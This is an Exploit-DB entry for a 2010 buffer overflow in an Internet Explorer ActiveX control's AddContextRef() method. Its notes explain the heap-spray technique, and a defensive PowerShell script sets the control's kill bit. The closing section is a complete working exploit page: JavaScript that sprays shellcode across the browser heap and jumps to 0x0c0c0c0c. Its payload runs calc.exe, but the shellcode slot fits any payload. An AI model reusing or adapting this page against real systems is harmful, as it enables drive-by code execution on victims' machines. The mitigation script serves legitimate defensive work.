Vendor: N/A
By: 牛奶坦克
CVSS: 7.5 (HIGH)
CWE: 119 (Buffer Overflow)
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2010

Exploit-DB Notes

This exploit targets a buffer overflow in the AddContextRef() method of the ActiveX control with CLSID 2745E5F5-D234-11D0-847A-00C04FD7BB08. The payload is a shellcode that runs calc.exe. The page first builds a large block of memory padded with the bytes 0x0C0C0C0C and appends the shellcode to it, then stores that block in each of 350 array elements so that the pattern is sprayed across the browser's heap. Finally, it calls AddContextRef() with the value 0x0c0c0c0c, which the notes describe as the address of the first element of the array.

Mitigation:

Disable the ActiveX control with CLSID 2745E5F5-D234-11D0-847A-00C04FD7BB08.
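One documented way to disable a specific ActiveX control on Windows is the Internet Explorer "kill bit": a Compatibility Flags value of 0x400 under the ActiveX Compatibility key for the control's CLSID, which prevents Internet Explorer and the WebBrowser control from instantiating it. The following PowerShell script is an added example (not part of the Exploit-DB entry or the original advisory) that checks whether the kill bit is set for the CLSID named above and sets it if it is not. The registry paths and the 0x400 flag are Microsoft's documented mechanism; the function names are my own.

```powershell
# Added example: audit and set the ActiveX kill bit for the vulnerable CLSID.
# Run from an elevated (Administrator) PowerShell session.
$clsid   = '{2745E5F5-D234-11D0-847A-00C04FD7BB08}'
$killBit = 0x400   # Compatibility Flags bit that blocks instantiation in IE

# Both the native key and the Wow6432Node key are set so that 32-bit and
# 64-bit instances of Internet Explorer honour the kill bit on x64 Windows.
$compatPaths = @(
    "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid",
    "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\ActiveX Compatibility\$clsid"
)

function Get-ControlServer {
    # Report which DLL the CLSID resolves to, so the affected binary can be
    # identified in inventory; returns $null if the control is not registered.
    $key = "Registry::HKEY_CLASSES_ROOT\CLSID\$clsid\InprocServer32"
    if (-not (Test-Path $key)) { return $null }
    return (Get-ItemProperty -Path $key).'(default)'
}

function Test-KillBit([string]$Path) {
    # True only if the key exists and bit 0x400 is present in Compatibility Flags.
    if (-not (Test-Path $Path)) { return $false }
    $flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return $false }
    return (($flags -band $killBit) -ne 0)
}

function Set-KillBit([string]$Path) {
    # OR the kill bit into any existing flags rather than overwriting them.
    if (-not (Test-Path $Path)) { New-Item -Path $Path -Force | Out-Null }
    $existing = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
                 -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $existing) { $existing = 0 }
    $newFlags = $existing -bor $killBit
    Set-ItemProperty -Path $Path -Name 'Compatibility Flags' -Value $newFlags -Type DWord
}

$server = Get-ControlServer
if ($server) { Write-Host "CLSID $clsid is registered, served by: $server" }
else         { Write-Host "CLSID $clsid is not registered on this host (kill bit still advisable)" }

foreach ($p in $compatPaths) {
    if (Test-KillBit $p) {
        Write-Host "Kill bit already set: $p"
    } else {
        Set-KillBit $p
        Write-Host "Kill bit set: $p"
    }
}
```

The check is read-only until Set-KillBit runs, so the first half can be used on its own to audit a fleet. Setting the kill bit does not unregister or remove the DLL; it only stops Internet Explorer and applications that host the WebBrowser control from creating the object, which is exactly the instantiation path the exploit page above relies on.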
Source

Exploit-DB raw data:

Exploit-DB Notes:
Original credit goes to "牛奶坦克" via WooYun:
http://www.wooyun.org/bugs/wooyun-2010-01006

<html>

<object classid="clsid:2745E5F5-D234-11D0-847A-00C04FD7BB08" id="target"></object>

<SCRIPT language="JavaScript">

// run calc.exe
var shellcode = unescape("%uc92b%ue983%ud9de%ud9ee%u2474%u5bf4%u7381%u0c13%u452b%u83df%ufceb%uf4e2%uc3f0%udf01%u2b0c%u9ace%ua030%uda39%u2a74%u54aa%u3343%u80ce%u2a2c%u96ae%u1f87%udece%u1ae2%u4685%uafa0%uab85%uea0b%ud28f%ue90d%u2bae%u7f37%udb61%uce79%u80ce%u2a28%ub9ae%u2787%u540e%u3753%u3444%u3787%udece%ua2e7%ufb19%ue808%u1f74%ua068%uef05%ueb89%ud33d%u6b87%u5449%u377c%u54e8%u2364%ud6ae%uab87%udff5%u2b0c%ub7ce%u7430%u2974%u7d6c%u27cc%ueb8f%u8f3e%udb64%udbcf%u4353%u21dd%u2586%u2012%u48eb%ub324%u2b6f%udf45%u0000");

// spray the heap first
var bigblock = unescape("%u0C0C%u0C0C");
var headersize = 20;
var slackspace = headersize + shellcode.length;
while (bigblock.length < slackspace) bigblock += bigblock;
var fillblock = bigblock.substring(0, slackspace);
var block = bigblock.substring(0, bigblock.length - slackspace);
while (block.length + slackspace < 0x40000) block = block + block + fillblock;
var memory = new Array();
for (var x = 0; x < 350; x++) memory[x] = block + shellcode;

// make the program call straight into it
target.AddContextRef(0x0c0c0c0c);

</script>

</html>